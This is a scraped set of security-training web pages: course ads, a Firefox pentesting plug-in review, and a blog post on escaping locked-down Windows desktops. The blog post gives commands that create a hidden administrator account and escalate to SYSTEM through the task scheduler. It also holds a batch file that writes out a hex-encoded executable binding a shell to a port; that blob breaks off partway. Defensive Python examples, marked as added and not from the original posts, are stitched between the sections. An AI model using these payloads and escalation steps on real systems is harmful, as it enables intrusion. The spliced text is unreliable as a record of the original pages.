Pentester Candidate Program – June 2018


On the 4th of June 2018, InfoSec Addicts will launch the Pentester Candidate Program. This program is designed to satisfy the basic requirements of a penetration tester. The program will cover the most common technical and soft skill requirements. Top candidates will later receive job interviews for a remote penetration testing job, through partnership with several penetration testing firms.

Top candidates may receive interview opportunities for a cleared penetration testing position. This is more so for those with a US Security Clearance and who live in either the DC, Maryland or Virginia areas.

This is a real chance for those who REALLY want to become pentesters. It is the perfect combination of hands-on training, mentorship, and a real job opportunity.


What is covered in the pentester program?

This program is hard, though rewarding. It will cover the following subject areas:

  • Command-Line Kung Fu
    • Linux Command-Line Fundamentals
    • Windows Command-Line Fundamentals
  • Network & Web App Penetration Testing
    • Scoping a penetration test
    • Performing a Penetration Test
    • Reporting penetration test findings
  • Ultimate Hacklab
    • Developing a solid attack process for lab environments
    • Scripting for challenge lab exams
    • Exploit development
    • Privilege escalation

 

  • Preparing for a job as a Penetration Tester
    • Resume assistance
    • Assistance with building a portfolio based on this program
    • Mock interview
    • Interviews with up to 10 Penetration Testing firms for top candidates
    • Interviews with up to 5 DoD contractors for top cleared candidates


What is the actual class schedule?

June classes

https://infosecaddicts.com/network-pentesting-night-school/
    + 11th and 13th of June 2018 from 7pm to 9pm ($200 if purchased separately)

https://infosecaddicts.com/linux-infosec-professionals-comptia/
    + 12th and 14th of June 2018 from 7pm to 9pm ($200 if purchased separately)

https://infosecaddicts.com/burp-suite-workshop/
    + 18th and 20th of June 2018 from 7pm to 9pm ($200 if purchased separately)

https://infosecaddicts.com/ultimate-hacklab-oscp-lpt-ecppt/
    + 25th and 27th of June 2018 from 7pm to 9pm ($200 if purchased separately)

 

How is the pentester program delivered?

Candidates will receive a set of tasks each Monday. They are to complete the tasks by Sunday at midnight EST. The tasks include:

  • Reading
  • Watching videos
  • Lab exercises to perform

On Thursdays from 7-8pm EST, a career development class will be held (focused on resume development, portfolio development, mock interviews, and discussions with potential employers).

On Saturdays from 4-6pm EST, a live online training session/QA period will be held.

 

What are the prerequisites for the pentester program?

This program is more about desire, work ethic, and the ability to work in a team environment. Although technical ability is important, it is not the most required attribute. That being said, candidates should have:

  • Familiarity with Windows, Linux, and VMware
  • Familiarity with basic programming concepts
  • Ability to commit 8-12 hours per week to the program

What do you receive?

  • Access to the training program
  • Weekly group mentoring sessions with Joe McCray
  • Monthly chances to speak with hiring managers and team leads. These are managers from security consulting firms. This will happen for each month of the program
  • Log book of all of your labs. This is a technical walk-through document demonstrating your proficiency to companies you interview with
  • A letter of reference from Joe McCray
  • Top candidates are guaranteed interviews with consulting firms and DoD contracting companies.

Candidates will have a chance to take ANY and AS MANY classes that they want from InfoSec Addicts. This will come as part of this program. Most notably, as many as 20 classes are held per month.

This program will run for 1 month only. It will run for the entire month of June 2018. Interviews for top candidates will occur later in the month of June 2018.

Please fill out the form below to sign up for this program.


 

 


PowerShell For InfoSec Professionals

PowerShell For InfoSec Professionals June2018

The simple fact is if you are going to be attacking or defending modern environments with newer operating systems (Windows 10, Server 2016) – you need Powershell!

There is no getting around it, and the sooner you drink the Powershell Koolaid the better InfoSec Professional you will be.


What will we be doing you ask – check this out:

 

Fundamentals:

  • Simple programming fundamentals
  • Cmdlets
  • Variables
  • WMI Objects

 

Security tasks with Powershell:

  • PowerShell Tool Development
  • PCAP Parsing and Sniffing
  • Malware Analysis

 

Pentesting tasks:

  • Ping Sweeping
  • Port Scanning
  • Enumerating Hosts/Networks
  • Download & Execute
  • Parsing Nmap scans
  • Parsing Nessus scan

 

 

Tool development:

  • Programming logic for security tasks
  • Tool structure
  • …..and of course, integrating with Metasploit, and other security tools


Students will receive

  • 20 hours of CPEs
  • Courseware slides
  • Lab Manual

Class Videos

Each class will be recorded and made available to the students via email. So you can keep up with the class even if you have to miss time or even a whole day.

 

 

 

Support

Each student will receive access to an InfoSec Addicts Group for the class. Groups are where students can ask questions outside of the regular class hours, work with other students on lab exercises, homework, and challenges.

A class mentor is assigned to the InfoSec Addicts Group to answer questions (allow one day for responses).

Similarly, a Customer Relationship Manager is assigned to the class to manage questions and support issues.

 

Class Schedule

18th and 20th of June 2018 from 7pm to 9pm EST

Fill out this form below to sign up for the class.


 

Unlimited classes:

If you know that you are interested in this class as well as other InfoSec classes then you should consider the unlimited classes package for $49.99 per month. You can find out more about it by clicking on the link below:

https://infosecaddicts.com/unlimited-classes/

 

NOTE: Due to Joe McCray’s travel and work schedule (ex: short notice consulting/training engagements or changes to those engagements) classes may reschedule or cancel. In these situations a refund will NOT be granted as the class will re-run the following week, or additional days will be added to the class schedule to make up for this.

FIREFOX PLUG-INS REVIEW

FIREFOX PLUG-INS EVERY SECURITY PERSONNEL NEEDS TO KNOW 

Plug-ins, additional features in a browser, enhance the user experience. Firefox is one browser that supports a variety of plug-ins. These could include video scripts, animations, and other elements. Browsers alone do not typically support these.

Understanding how plug-ins work and interact with browsers is important, because most malicious attacks use plug-ins as a cyber-trespassing and theft tool. Moreover, by understanding how plug-ins work, we can secure our systems properly.

Plug-ins have a multitude of purposes. They are used for safe browsing, information gathering, entertainment, and other uses. Below are useful plug-ins one can use to gather information and carry out penetration testing.

FoxyProxy Standard

This add-on is a proxy management tool. It improves the browser’s proxy capabilities and provides analysis of URL patterns. It also switches the network connection among different proxy servers. One sees an animated icon on the browser when a proxy is in use.

FoxyProxy Standard has a history tab that logs the servers used. It is possible to set the plug-in for use when necessary based on the URL’s nature. This, as a result, makes the add-on more efficient than other proxy management plug-ins.


Firebug

This is a Firefox web development tool embedded into the browser. It enables editing of HTML, JavaScript or CSS directly from the live page. The changes are seen directly after saving.

This plugin helps in pinpointing web application and web page vulnerabilities. It opens a window to launch a penetration attack and can collect a user’s data. It also enables inspection of HTML elements in the page.

The CSS tab functions to check and edit the style of the page. It is a convenient way to edit the look of the page and view the changes immediately. Code can also be copied for further development outside the browser. It also enables scaling and margin setup to align text and images. Additionally, Firebug monitors network activity: if a page is loading slowly, you can check what causes the lag from this plug-in. Firebug also has a powerful JavaScript debugger that identifies errors and measures the performance of a script.

The DOM tab found in the Firebug panel helps identify code tags and edit them. This plugin also allows the easy management of cookies. All accepted cookies are reviewed as they are listed according to value.


Live HTTP Headers

Live HTTP Headers is an effective penetration testing tool used for troubleshooting, tuning and analyzing a website. This plug-in shows data such as language, caching, authorization, and character set. Normally, these data are invisible; this plug-in, however, enables access to this information.

To obtain header information, right-click on the page and select “View Page Info.” Next, click the header tab in the new pop-up window to view page information. Press “Ctrl+Shift+A” to replay the header.


This plug-in is considered a sniffer application because it can view HTTP header exchanges. You can see what is happening, analyze it, and stop packet capture. To change header or URL values, you only need to highlight, edit and replay a packet. Finally, this works on both Windows and Linux.

Hackbar

Hackbar is another penetration testing tool. It appears as an extension of the address bar. Hackbar is capable of performing POST data manipulation, encryption, and encoding. This helps test XSS holes, web security, and SQL injections. Moreover, one can work on hash algorithms, Base64 decoding, and other data types with Hackbar.

Firesheep

Firesheep gives you the capability to attack the HTTP sessions of other users on the same network. This plug-in shows all accounts found on the network. It uses the cookie unique to a logged-in account. This is a result of websites protecting the initial log-in but leaving the rest of the session unprotected.

These cookies are readily available for use by attackers on any open network. Firesheep captures users visiting an unsecured page. Double-clicking a seized item logs you in as that user.
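Firesheep works because the site sends its session cookie without the Secure flag, so the cookie travels over plain HTTP where anyone on the network can read and replay it. The practical defence is to check the Set-Cookie headers a site returns, which is exactly the data Live HTTP Headers exposes. The script below is an added example, not part of the original post or of either plug-in: it parses a constructed HTTP response and reports every cookie that is missing the Secure, HttpOnly or SameSite attribute.

```python
"""Flag cookies that a sniffer on an open network could read or replay.

Added example: parses raw HTTP response headers (the data Live HTTP Headers
shows) and reports cookies missing Secure, HttpOnly or SameSite.
"""

# Constructed sample response; not captured from any real site.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "Set-Cookie: sessionid=abc123; Path=/; HttpOnly\r\n"
    "Set-Cookie: csrftoken=def456; Path=/; Secure; HttpOnly; SameSite=Lax\r\n"
    "Set-Cookie: remember_me=1; Path=/; Expires=Wed, 21 Oct 2026 07:28:00 GMT\r\n"
    "\r\n"
    "<html>...</html>"
)

# Attributes every session-bearing cookie should carry.
REQUIRED_ATTRS = ("Secure", "HttpOnly", "SameSite")


def parse_set_cookies(raw_response: str) -> list:
    """Return [(cookie_name, {attribute_lowercase: value}), ...] from a raw response."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    cookies = []
    for line in head.split("\r\n")[1:]:          # skip the status line
        header, sep, value = line.partition(":")
        if not sep or header.strip().lower() != "set-cookie":
            continue
        parts = [p.strip() for p in value.split(";")]
        name = parts[0].split("=", 1)[0].strip()
        attrs = {}
        for part in parts[1:]:
            key, _, val = part.partition("=")
            # flag-only attributes (Secure, HttpOnly) have no value; store True
            attrs[key.strip().lower()] = val.strip() or True
        cookies.append((name, attrs))
    return cookies


def audit_cookies(raw_response: str) -> list:
    """Return [(cookie_name, missing_attribute), ...]; an empty list means every cookie is hardened."""
    issues = []
    for name, attrs in parse_set_cookies(raw_response):
        for attr in REQUIRED_ATTRS:
            if attr.lower() not in attrs:
                issues.append((name, attr))
    return issues


if __name__ == "__main__":
    for name, attr in audit_cookies(SAMPLE_RESPONSE):
        print(f"cookie {name!r} is missing {attr}")
```

On the constructed response, sessionid lacks Secure and SameSite, remember_me lacks all three, and csrftoken passes. A cookie flagged for Secure is the one a Firesheep-style capture would pick up on an open network; HttpOnly and SameSite close off the script-access and cross-site routes to the same cookie.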

Tamper Data

Tamper Data is used to edit and view HTTP requests. This add-on records ongoing requests for display on a particular website. The window shows details such as time, total duration, size and other information. Most noteworthy is that the data is copied to an external file for future reference.


CryptoFox

CryptoFox is an encryption-decryption plug-in. It appears as an extension of the address bar. Moreover, it has two fields. The first one corresponds to the text that needs encryption. The next field is a selection of the desired encryption method.

CryptoFox performs over 40 techniques. Furthermore, it has a dictionary attack reference for MD5 passwords. To test this plug-in, here is an AES 128-bit encryption; we will then use the AES 128-bit decrypt method to check it.


Type “helloworld!” in the text field. Next, select AES 128-bit encryption and then press the decode button. Enter “passwd” when asked for a password. Especially relevant is that we will use this same password for the decryption later.


After entering your password, click OK. This encrypts the text, which is then displayed in the first field. For cross-checking purposes, select AES 128-bit Decrypt and use the same password.


Anonymox

Anonymox is a useful plug-in that enables anonymous browsing in Firefox. This plug-in creates a virtual identity that protects you and gives access to sites commonly banned on your network. It also helps one change their IP address.

In addition, one can tweak Anonymox’s customizable settings per every website. Bypassing GeoIP blocks is also possible through this add-on. This is possible as it changes your origin location. This, as a result, gives you access to banned sites in your country.

Anonymox acts as a middle ground: the request is sent to the plug-in, and the plug-in itself then replies to the web host. It enables you to select proxy identities.


SQL Inject Me

This penetration testing plug-in identifies SQL injection vulnerabilities. It looks for database errors and loopholes by sending escape strings to the database. A completed test result shows the errors found and the options.


Certificate Patrol

Certificate Patrol helps pinpoint man-in-the-middle attacks by checking SSL certificates. It shows whether anything within the certificate was modified during an exchange. This add-on uses pop-ups to inform you of SSL details and lets you choose whether to save them. If saved, the plug-in can cross-check for disparities.

To verify a certificate, the plug-in shows the old and new versions of the SSL certificate. You must be careful in finding and comparing differences. Click the Reject button should you find anything suspicious.
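Certificate Patrol’s check amounts to remembering the fingerprint a host presented last time and comparing it with the one presented now. The following is an added example, not code from the original post or from the Certificate Patrol add-on, that implements that pin store in Python. The two certificate byte strings are constructed stand-ins for DER certificates, cert_pins.json is an assumed location for the store, and fetch_der_cert() shows how the live certificate would be obtained with the standard library but is not exercised offline.

```python
"""Pin TLS certificate fingerprints per host and flag changes, Certificate Patrol style.

Added example. CERT_V1/CERT_V2 are constructed stand-ins, not real certificates.
"""
import hashlib
import json
import socket
import ssl
from pathlib import Path

PIN_FILE = Path("cert_pins.json")   # assumed location of the local pin store

# Constructed stand-ins for two DER-encoded certificates of the same host.
CERT_V1 = b"constructed DER bytes for example.test, serial 1"
CERT_V2 = b"constructed DER bytes for example.test, serial 2"


def fingerprint(der_cert: bytes) -> str:
    """SHA-256 fingerprint of a DER certificate, colon-separated as browsers display it."""
    digest = hashlib.sha256(der_cert).hexdigest().upper()
    return ":".join(digest[i:i + 2] for i in range(0, len(digest), 2))


def fetch_der_cert(host: str, port: int = 443, timeout: float = 5.0) -> bytes:
    """Fetch the leaf certificate a live server presents (network access; not used offline)."""
    ctx = ssl.create_default_context()
    with socket.create_connection((host, port), timeout=timeout) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            return tls.getpeercert(binary_form=True)


def load_pins(path: Path = PIN_FILE) -> dict:
    """Load {host: fingerprint} from disk; an absent file means no pins yet."""
    return json.loads(path.read_text()) if path.exists() else {}


def save_pins(pins: dict, path: Path = PIN_FILE) -> None:
    path.write_text(json.dumps(pins, indent=2))


def check_certificate(host: str, der_cert: bytes, pins: dict) -> str:
    """Compare the presented certificate with the stored pin.

    Returns 'new' (first sight; pin stored), 'unchanged', or 'changed'.
    A changed certificate is NOT stored automatically: the old and new
    fingerprints stay available so the user can compare them, exactly the
    decision Certificate Patrol puts in front of you before you accept or reject.
    """
    fp = fingerprint(der_cert)
    stored = pins.get(host)
    if stored is None:
        pins[host] = fp
        return "new"
    return "unchanged" if stored == fp else "changed"


def accept_certificate(host: str, der_cert: bytes, pins: dict) -> None:
    """Explicitly replace the pin after the user has reviewed a change."""
    pins[host] = fingerprint(der_cert)


if __name__ == "__main__":
    pins = {}
    for cert in (CERT_V1, CERT_V1, CERT_V2):
        verdict = check_certificate("example.test", cert, pins)
        print(f"example.test: {verdict:9} old={pins['example.test'][:23]}... new={fingerprint(cert)[:23]}...")
```

A "changed" verdict is not proof of interception (certificates are renewed, and large sites rotate between several), which is why the example leaves the decision to the reviewer rather than auto-accepting; a change that also alters the issuer or arrives well before the old certificate’s expiry is the pattern worth rejecting.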


FoxySpider

Web crawlers are useful. FoxySpider in Firefox is one such add-on that organizes a website. It displays and arranges videos, music, images, etc. according to file types. It is useful in gathering information about a website.

An icon on the left side of the address bar indicates that FoxySpider is installed. There are three settings for this tool. Left clicking organizes the files, while right-clicking opens a search configuration window. Middle clicking on the icon, on the other hand, pops up a window to set requirements such as keywords or specified URLs.


Firefox has a 35% user rating. With plug-ins such as these, security engineers can find it convenient to perform their tasks. Testing and gathering information is made easier with these add-ons. We encourage you to download these plug-ins and try them out yourself.

Source: http://resources.infosecinstitute.com/firefox-plug-ins-that-a-security-engineer-need-to-know/


Python For InfoSec Professionals

Python For InfoSec Professionals Night Class

This class aims at making students comfortable with using Python to perform simple IT Security tasks. Going beyond using other peoples’ tools in this field is the hardest step on the ladder to proficiency. This class will take you over that difficult step, enabling you to modify popular security tools or write your own. Most importantly, it is all taught in a simple manner that won’t put you to sleep like most programming courses.

 

Class Outline

Programming Concepts, Parsing Files, Logs, and PCAPs

  • Python Basics
  • Text File Parsing
  • CSV File Parsing
  • Log Parsing


 

  • PCAP Parsing
  • Port-Scanning
  • Bind/Reverse Shells
  • Scapy

 

  • SQL Injection
  • XSS
  • RFI/LFI

 

  • Memory Analysis
  • Identifying/Classifying/Analyzing Malware
  • Exploit Development with Python
  • Debugger automation

Please register to attend the class:

 


Students will receive

  • 30 hours of CPEs
  • Courseware slides
  • Lab Manual

Class Videos

Each class will be recorded and made available to the students via email. So you can keep up with the class even if you have to miss time or even a whole day.

Support

Each student will receive access to an InfoSec Addicts Group (infosecaddicts.com) for the class. Groups are where students can ask questions outside of the regular class hours, work with other students on lab exercises, homework, and challenges.

A class mentor is assigned to the InfoSec Addicts Group to answer questions (allow one day for responses).

Similarly, a Customer Relationship Manager is assigned to the class to manage questions and support issues.

Class Schedule

28th and 30th of May 2018 from 7pm to 9pm EST

 

Class Cost: $200

Fill out this form to sign up for the class.


 

 

Unlimited classes:

If you know that you are interested in this class as well as other InfoSec classes then you should consider the unlimited classes package for $49.99 per month. You can find out more about it by clicking on the link below:

https://infosecaddicts.com/unlimited-classes/

 

NOTE: Due to Joe McCray’s travel and work schedule (ex: short notice consulting/training engagements or changes to those engagements) classes may reschedule or cancel. In these situations a refund will NOT be granted as the class will re-run the following week, or additional days will be added to the class schedule to make up for this.

CYBERWAR: Advanced Offensive Cyber Operations


I’m writing this post to let you know that the new night class version of the CyberWar: Advanced Offensive Cyber Operations course is ready to go. I’d love it if you’d sign up for this class. This is one superb class! Here is the CyberWar: Advanced Offensive Cyber Operations course outline.

  • Advanced Scanning & Enumeration
    • Attack Methodology
    • Identifying vulnerabilities
    • Using NMap NSE scripts
    • Writing your own NMap NSE scripts
  • Advanced Metasploit
    • Auxiliary modules
    • Post modules
    • Writing your own Auxiliary modules
    • Writing your own Post modules
  • Attacking Web Apps & Databases
    • Attacking Web Apps (ASPX and PHP)
    • Web App – Tricky SQL Injections
    • Dealing with Web Application Firewalls
    • Attacking Big Data Solutions

 

Final Mission:

Students will attack the servers in the lab environment. These servers are much harder to penetrate than standard servers in the typical production environment. Similarly, these vulnerabilities are difficult to exploit (on purpose) – this particular class is designed with several complex targets to help students prepare for the OSCP exam network challenge certification.

Lab Network Access

Strategic Security now has a penetration tester’s target practice lab environment. Targets in the lab network will change on the 1st of every month. Students have the option to purchase 1 or 3 months of access to the lab environment.

Students will receive

  • 30 hours of CPEs
  • Several virtual machines
  • Courseware slides
  • Lab Manual
  • Lab access

Class Videos

Students will receive all class recordings via their emails. This will help them keep up with the class even if they have to miss time or even a whole day.

Support

Each student will have access to an InfoSec Addicts Group (infosecaddicts.com) for the class. Groups are where students can ask questions outside of the regular class hours. Additionally, this is where they can work with other students on lab exercises, homework, and challenges. A Strategic Security class mentor will be assigned to the InfoSec Addicts Group to answer questions (allow one day for responses). Likewise, a Customer Relationship Manager will get assigned to the class to manage questions and support issues.

Class Schedule

4th and 6th of June 2018 from 7pm to 9pm EST

 

Class Cost

The class cost is $200 with 1 month of lab access.

 

Register to attend the class:

Fill out this form to sign up for the class.


Unlimited classes:

If you know that you are interested in this class as well as other InfoSec classes then you should consider the unlimited classes package for $49.99 per month. You can find out more about it by clicking on the link below:

https://infosecaddicts.com/unlimited-classes/

 

NOTE: Due to Joe McCray’s travel and work schedule (ex: short notice consulting/training engagements or changes to those engagements) classes may reschedule or cancel. In these situations a refund will NOT be granted as the class will re-run the following week, or additional days will be added to the class schedule to make up for this.

BYPASSING RESTRICTED ENVIRONMENTS

I just got an email from an old student that is doing a pentest and he asked me about pentesting restricted environments like locked down desktops, Citrix, kiosks, etc. I figured I’d put together a blog post on the subject. Later, if people like it, I will do some more blog posts that go deeper into the subject, probably covering things like bypassing Software Restriction Policy (SRP) and breaking out of sandboxes. So here goes...

Windows Environments

There are a lot of different ways to lock down a Windows environment. Certainly, the most widely used method is through Group Policy. Group Policy is a set of rules that govern the environment (restriction of access to certain programs, tools, folders, etc.).

Opening Windows folders with Internet Explorer

Chances are that most vital programs and functions, which would allow any noteworthy access, are blocked in a corporate or public environment. Luckily though, 99% of the time, Internet Explorer is not blocked as it is a vital part of the business functionality. For this reason, we will use the Shell handler to access Windows folders through Internet Explorer. Basically, if you enter a particular string into the URL bar of IE, an instance of explorer.exe will spawn and browse to the specified folder. Note that these work with Internet Explorer ONLY.

Here are some examples of different commands:

  • shell:profile: opens the User Profile for whatever account you are logged in as.
  • shell:programfiles: opens the Program Files folder.
  • shell:system: opens the system32 folder.
  • shell:controlpanelfolder: opens the Control Panel.
  • shell:windows: opens the WINDOWS folder.

Additionally, one can navigate to the Control Panel folder by entering the following command into the URL bar: shell:::{21EC2020-3AEA-1069-A2DD-08002B30309D}

 


Accessing cmd.exe through the Microsoft Help and Support Center (this works on Windows XP and Windows 2003, not on Windows 7)

If access to cmd.exe through ordinary means is disabled, there is another way of accessing it. This technique uses the Help and Support Center to spawn a command prompt for user interaction. To do this, just enter the following command into the URL bar in Internet Explorer:

HCP:// Help And Support Center


After entering the command, you can see that the Help and Support Center window has spawned. Next, type “Command Prompt” into the search bar and hit Enter. On the left-hand side of the window under Suggested Topics, you will see a result called “Using Command Prompt”; click it.

 

 


 

Finally, click on the highlighted link named “Command Prompt” and voila, you have a shell!

 


 


Defeating Blacklists

Similarly, Windows Explorer becomes completely blacklisted in some cases. You may not be able to get to it from the Start Menu. In the same way, we can use Internet Explorer to spawn an explorer.exe window and have it navigate to a particular file location. Here is an example of this relatively simple technique:

Typing C:\windows into the URL bar accesses the WINDOWS folder on the C: drive


 

In several situations, C:\windows itself may be blocked. Nevertheless, you can substitute any of the following; just enter any of them into the URL bar to achieve the same result:

File:/C:/windows

File:/C:\windows\

File:/C:\windows/

File:/C:/windows

File://C:/windows

File://C:\windows/

File://C:\windows

C:/windows

 C:/windows/

C:/windows\

%WINDIR%

In addition, you can use the same technique to enter other commands into the URL bar. The commands jump to different file locations:

Command          Jumps to
-------------    -----------
%TMP%            C:\Documents and Settings\Administrator\Local Settings\Temp
%TEMP%           C:\Documents and Settings\Administrator\Local Settings\Temp
%SYSTEMDRIVE%    C:\
%SYSTEMROOT%     C:\WINDOWS
%APPDATA%        C:\Documents and Settings\Administrator\Application Data
%HOMEDRIVE%      C:\
%HOMESHARE%      Fully qualified path to your server-based profile
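From the defender’s side, the point of the lists above is that one folder can be reached under a dozen spellings, so a block rule or a log search that matches only the literal C:\windows misses most of them. The function below is an added example, not from the original post, that canonicalises an Internet Explorer address-bar entry into either a filesystem path or a shell: namespace target before anything is compared or alerted on. It goes beyond the single folder in the post: it handles every File:/ and slash variant listed above, the environment-variable forms from the table, and the shell: handlers from the earlier section. The sample entries are constructed.

```python
"""Canonicalise Internet Explorer address-bar entries before matching them.

Added example: C:/windows, File://C:\\windows/, %WINDIR% and friends all name
the same folder; reduce each spelling to one form so a block rule or a log
search compares against a single target.
"""
import re

SHELL_RE = re.compile(r"^shell:(.*)$", re.IGNORECASE)       # shell:system, shell:::{GUID}
FILE_SCHEME_RE = re.compile(r"^file:", re.IGNORECASE)       # File:/C:/..., File://C:\...
DRIVE_RE = re.compile(r"^[A-Za-z]:(?:[\\/]|$)")             # C:\..., C:/..., C:
ENV_VAR_RE = re.compile(r"^%[A-Za-z_][A-Za-z0-9_]*%")       # %WINDIR%, %SYSTEMROOT%\system32

# Constructed sample of address-bar entries as they might appear in a proxy or
# browser-history log. The first ten are the equivalents listed in the post.
SAMPLE_ENTRIES = [
    "File:/C:/windows", "File:/C:\\windows\\", "File:/C:\\windows/", "File://C:/windows",
    "File://C:\\windows/", "File://C:\\windows", "C:/windows", " C:/windows/", "C:/windows\\",
    "C:\\windows", "%WINDIR%", "%SYSTEMROOT%\\system32", "shell:system",
    "shell:::{21EC2020-3AEA-1069-A2DD-08002B30309D}", "https://intranet.example.test/",
]


def normalize_ie_location(entry: str) -> dict:
    """Classify one entry as 'shell_namespace', 'filesystem' or 'web' with a canonical target."""
    s = entry.strip()
    m = SHELL_RE.match(s)
    if m:
        return {"kind": "shell_namespace", "target": m.group(1).strip().lower()}
    via_file_scheme = bool(FILE_SCHEME_RE.match(s))
    if via_file_scheme:
        # file:/C:/x, file://C:\x and file:///C:/x all name the same path
        s = FILE_SCHEME_RE.sub("", s, count=1).lstrip("/\\")
    if via_file_scheme or DRIVE_RE.match(s) or ENV_VAR_RE.match(s):
        # unify slashes, drop a trailing separator, and ignore case (Windows paths are case-insensitive)
        path = s.replace("/", "\\").rstrip("\\")
        return {"kind": "filesystem", "target": path.lower(), "via_env": path.startswith("%")}
    return {"kind": "web", "target": s}


def flag_local_navigation(entries) -> list:
    """Return (entry, canonical) pairs for every entry that is not an ordinary web URL."""
    flagged = []
    for entry in entries:
        info = normalize_ie_location(entry)
        if info["kind"] != "web":
            flagged.append((entry, info))
    return flagged


if __name__ == "__main__":
    for entry, info in flag_local_navigation(SAMPLE_ENTRIES):
        print(f"{entry!r:50} -> {info['kind']}: {info['target']}")
```

The canonical target is what a block list or detection rule should key on; an entry whose via_env flag is set still needs the variable expanded on the host before the final path is known, which is why the example reports it separately rather than guessing at the expansion.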

Create a new user and add them to the Administrators Group

This is another simple task which consists of 2 commands. The syntax for creating a new user is net user *whatever username you want* *whatever password* /add. The syntax for then adding a user to a certain group is net localgroup *whatever group you want to add the user to* *the user you wish to add* /add. At this point, we will create a user called secure with the password ninja. Later, we will add the user to the Administrators group:


 

Simple privilege escalation (doesn’t work in Win 7 and above)

This time, we are going from a standard Administrator account up to a system-level account in a few simple tricks. First of all, on a standard user account, open up a command prompt and type “at.” If the command errors out, then this escalation technique will not work. However, if it tells you “There are no entries in the list,” then this method will work for you:

 


 

Now that we know this will work, we need to schedule a job. We are going to schedule an interactive command shell to spawn:

at 20:10 /interactive "cmd.exe"

or

SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10

 

After spawning the shell, note that the title bar says svchost.exe and not cmd.exe. That is because it was generated by the Task Scheduler service, which runs under the Local System account:


 

Since we have a command shell running with system privileges, let’s shed this user environment. Next, press Ctrl+Alt+Delete to open the Task Manager. Under the Processes tab, find explorer.exe and kill the process:


 

As a result, you will notice that the desktop has disappeared.  Next, go back to the system command shell and type in “explorer.exe.”  This will consequently spawn a new desktop environment, which will be a system level environment. This is because it was spawned from a system level command shell:


 

Creating a program that binds a shell to a port using a batch file

At this point, we will use a batch file to create an executable which in turn binds a command shell to a specified port.  This is nice because it is relatively quick and, furthermore, running the batch file is all you have to do; the rest is automatic. Meanwhile, let us have a look at the code before we get started:

echo off && echo n 1.dll >123.hex && echo e 0100 >>123.hex

echo 4d 5a 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 00 00 50 45 00 00 4c 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 00 00 00 02 00 00 00 00 00 00 00 00 00 00 67 42 00 00 10 00 00 00 00 10 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 50 00 00 00 02 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00  >>123.hex

echo e 0180 >>123.hex && echo 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 63 42 00 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  >>123.hex

echo e 0200 >>123.hex && echo 00 00 00 00 00 00 00 00 4d 45 57 00 46 12 d2 c3 00 30 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 c0 02 d2 75 db 8a 16 eb d4 00 10 00 00 00 40 00 00 77 02 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 c0 be 1c 40 40 00 8b de ad ad 50 ad 97 b2 80 a4 b6 80 ff 13 73 f9 33 c9 ff 13 73 16 33 c0 ff 13 73 21 b6 80 41 b0 10 ff 13  >>123.hex

echo e 0280 >>123.hex && echo 12 c0 73 fa 75 3e aa eb e0 e8 72 3e 00 00 02 f6 83 d9 01 75 0e ff 53 fc eb 26 ac d1 e8 74 2f 13 c9 eb 1a 91 48 c1 e0 08 ac ff 53 fc 3d 00 7d 00 00 73 0a 80 fc 05 73 06 83 f8 7f 77 02 41 41 95 8b c5 b6 00 56 8b f7 2b f0 f3 a4 5e eb 9b ad 85 c0 75 90 ad 96 ad 97 56 ac 3c 00 75 fb ff 53 f0 95 56 ad 0f c8 40 59 74 ec 79 07 ac 3c 00 75 fb 91 40 50 55 ff 53 f4 ab 75 e7 c3 00 00 00 00 00  >>123.hex

echo e 0300 >>123.hex && echo 33 c9 41 ff 13 13 c9 ff 13 72 f8 c3 38 42 00 00 45 42 00 00 00 00 00 00 00 40 40 00 30 01 40 00 00 10 40 00 00 10 40 00 68 1c fa 31 40 03 6a 01 e8 fc 86 02 f9 f5 30 ba 18 fc fb bf 14 b2 c7 1f 6a 91 02 06 bd 3c 0c 02 e8 b0 23 a3 60 f6 59 66 c7 05 58 ce 4f 02 15 3a 19 e8 d8 5d 50 d9 aa 86 3d 66 a3 5a 31 c8 3c 5c a0 01 14 6a 10 68 29 14 ff 35 36 14 e8 82 12 29 05 0d 94 81 5e d0 0f ca  >>123.hex

echo e 0380 >>123.hex && echo 60 5c c5 a1 1e 05 88 3c 30 be c2 2a 44 51 45 04 ea 2d 14 fe 28 9f 42 68 48 93 a9 45 31 46 fb 28 e1 08 a5 8b 0b 85 46 14 e8 26 5f 07 c3 cc ff 25 20 1a 81 bb 2a 14 06 43 0c 21 1c 90 18 c8 10 64 04 4e cc 20 55 8b ec 81 c4 3f 7c fe f1 0c 56 57 e8 3a c7 89 03 45 fc 33 c9 8b 75 a9 ac 3c c0 74 07 e8 22 f2 f7 03 41 eb f4 51 d1 e9 90 e1 58 3b 01 c1 74 0b 5f 5e b8 03 10 c9 c2 08 e1 86 49 8d  >>123.hex

